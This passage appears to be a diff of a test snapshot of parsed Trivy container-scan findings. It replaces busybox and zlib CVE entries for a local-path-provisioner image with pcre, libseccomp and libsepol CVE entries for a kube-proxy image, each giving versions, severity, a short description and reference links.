PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42383", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - }, - { - "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42384", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42384", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42384", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42384", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42384", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42385", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42385", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42385", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42385", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42386", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42386", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42386", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42386", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42386", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r22", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-28391", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9893", + "installedVersion": "2.3.3-4", + "packageName": "libseccomp2", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28391", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", - "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", - "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", - "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "https://access.redhat.com/errata/RHSA-2019:3624", + "https://access.redhat.com/security/cve/CVE-2019-9893", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "https://github.com/seccomp/libseccomp/issues/139", + "https://linux.oracle.com/cve/CVE-2019-9893.html", + "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "https://seclists.org/oss-sec/2019/q1/179", + "https://security.gentoo.org/glsa/201904-18", + "https://ubuntu.com/security/notices/USN-4001-1", + "https://ubuntu.com/security/notices/USN-4001-2", + "https://usn.ubuntu.com/4001-1/", + "https://usn.ubuntu.com/4001-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "https://www.openwall.com/lists/oss-security/2019/03/15/1", ], }, "category": "Vulnerability", - "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: remote attackers may execute arbitrary code if netstat is used", + "name": "libseccomp: incorrect generation of syscall filters in libseccomp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28391", + "value": "https://avd.aquasec.com/nvd/cve-2019-9893", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28391", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "value": "https://access.redhat.com/errata/RHSA-2019:3624", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "value": "https://access.redhat.com/security/cve/CVE-2019-9893", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "value": "https://github.com/seccomp/libseccomp/issues/139", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42374", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42374", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42374", - ], - }, - "category": "Vulnerability", - "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42374", + "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42374", + "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "value": "https://seclists.org/oss-sec/2019/q1/179", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://security.gentoo.org/glsa/201904-18", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://ubuntu.com/security/notices/USN-4001-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://ubuntu.com/security/notices/USN-4001-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "value": "https://usn.ubuntu.com/4001-1/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://usn.ubuntu.com/4001-2/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.2.12-r2", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-37434", - "installedVersion": "1.2.11-r3", - "packageName": "zlib", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": 